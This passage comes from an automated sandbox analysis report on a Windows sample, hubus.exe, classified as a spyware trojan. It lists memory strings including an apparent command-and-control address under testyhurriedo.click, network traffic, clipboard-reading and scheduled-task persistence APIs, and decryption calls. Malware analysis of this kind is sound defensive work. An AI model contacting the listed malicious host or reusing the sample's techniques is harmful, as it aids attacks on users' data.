                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                          Source: chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                          Source: chrome.exe, 00000002.00000003.12103309788.00002D20005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103422867.00002D20005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103236894.00002D20005AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comp_4x
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shinobi.jp
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.advanceautoparts.com/web/OrderItemDisplay
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.lululemon.com/shop/mybag
                          Source: chrome.exe, 00000002.00000002.12194634488.00002D2402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197980545.00002D2403538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194010718.00002D2402E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapchat.com
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/cart/
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.usps.com/store/cart/cart.jsp
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://storygize.net
                          Source: chrome.exe, 00000002.00000002.12194634488.00002D2402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
                          Source: chrome.exe, 00000002.00000002.12183494614.00002D2000070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: chrome.exe, 00000002.00000002.12195046159.00002D2403004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000156A000.00000004.00000020.00020000.00000000.sdmp, hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000001.00000002.12268716447.0000000001586000.00000004.00000020.00020000.00000000.sdmp, hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/
                          Source: hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/3
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/D
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/api
                          Source: hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/apiO
                          Source: hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/pi
                          Source: hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/s
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tpc.googlesyndication.com/sodar/Enqz_20U.html
                          Source: chrome.exe, 00000002.00000002.12192872362.00002D2402BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12147909365.00002D24038D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191554369.00002D2402A70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tr.snapchat.com/cm/i
                          Source: chrome.exe, 00000002.00000003.12147909365.00002D24038D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191554369.00002D2402A70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1cc
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                          Source: chrome.exe, 00000002.00000002.12196370294.00002D2403298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weborama-tech.ru
                          Source: chrome.exe, 00000002.00000002.12191619755.00002D2402A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com/
                          Source: chrome.exe, 00000002.00000002.12191619755.00002D2402A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191342488.00002D2402A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.html
                          Source: chrome.exe, 00000002.00000002.12187055049.00002D24022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ww.goog
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.abebooks.com/servlet/ShopBasketPL
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.academy.com/shop/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.acehardware.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.adorama.com/als.mvc/cartview
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ae.com/us/en/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.altardstate.com/cart/
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/gp/cart/view.html
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/gp/cart/view.html
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anthropologie.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apple.com/shop/bag
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/purchase/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.att.com/buy/cart
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12187055049.00002D24022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/
                          Source: chrome.exe, 00000002.00000002.12200633021.00002D2403A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198816161.00002D2403668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
                          Source: chrome.exe, 00000002.00000002.12200633021.00002D2403A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeime
                          Source: chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198933834.00002D24036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exe
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
                          Source: chrome.exe, 00000002.00000002.12191913903.00002D2402AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/v
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.basspro.com/shop/AjaxOrderItemDisplayView
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bathandbodyworks.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bedbathandbeyond.com/store/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belk.com/shopping-bag/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bhphotovideo.com/find/cart.jsp
                          Source: chrome.exe, 00000002.00000002.12191619755.00002D2402A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.do
                          Source: chrome.exe, 00000002.00000002.12191619755.00002D2402A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=58216995782927489&postID=5453638059923624242&blogspo
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bloomingdales.com/my-bag
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.boostmobile.com/cart.html
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bricklink.com/v2/globalcart.page
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.brownells.com/aspx/store/cart.aspx
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.buybuybaby.com/store/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.carid.com/cart.php
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chegg.com/shoppingcart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.containerstore.com/cart/list.htm
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.costco.com/CheckoutCartDisplayView
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.crateandbarrel.com/Checkout/Cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dickssportinggoods.com/OrderItemDisplay
                          Source: chrome.exe, 00000002.00000002.12189891160.00002D24027A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dillards.com/webapp/wcs/stores/servlet/OrderItemDisplay
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dsw.com/en/us/shopping-bag
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zappos.com/cart
                          Source: chrome.exe, 00000002.00000002.12191138758.00002D2402A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zazzle.com/co/cart
                          Source: chrome.exe, 00000002.00000002.12191138758.00002D2402A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zennioptical.com/shoppingCart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www2.hm.com/en_us/cart
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youronlinechoices.eu
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49744 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49745 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49760 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49761 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49762 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49763 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49764 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49765 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49766 version: TLS 1.2
                          Source: C:\Users\user\Desktop\hubus.exe Code function: 1_2_00432BE0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,1_2_00432BE0
                          Source: C:\Users\user\Desktop\hubus.exe Code function: 1_2_0041BBE0 CreateDesktopW,1_2_0041BBE0
                          Source: C:\Users\user\Desktop\hubus.exe Code function: String function: 004149F0 appears 57 times
                          Source: C:\Users\user\Desktop\hubus.exe Code function: String function: 00407F80 appears 47 times
                          Source: hubus.exe, 00000000.00000002.12072878868.000000000103E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004235000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hubus.exe
                          Source: hubus.exe, 00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesh.exe& vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12084979136.000000000412B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRvcuxtyhkb.dll" vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12087038268.00000000057C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRvcuxtyhkb.dll" vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12088688040.0000000005C00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hubus.exe
                          Source: hubus.exe, 00000000.00000002.12074166269.0000000003021000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs hubus.exe
                          Source: hubus.exe Binary or memory string: OriginalFilenamesh.exe& vs hubus.exe
                          Source: hubus.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: hubus.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: hubus.exe, x7M8VDknD2gjeiKYIQ.cs Cryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, jHbxqbxSp2bmg9amyFB.cs Cryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.5c00000.6.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                          Source: 0.2.hubus.exe.4025570.3.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                          Source: 0.2.hubus.exe.425e9b8.2.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/0@4/5
                          Source: C:\Users\user\Desktop\hubus.exe Code function: 1_2_00437B10 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,1_2_00437B10
                          Source: C:\Users\user\Desktop\hubus.exe Mutant created: NULL
                          Source: C:\Users\user\Desktop\hubus.exe Mutant created: \Sessions\1\BaseNamedObjects\Eptsphctnf
                          Source: hubus.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\hubus.exe System information queried: HandleInformation
                          Source: C:\Users\user\Desktop\hubus.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
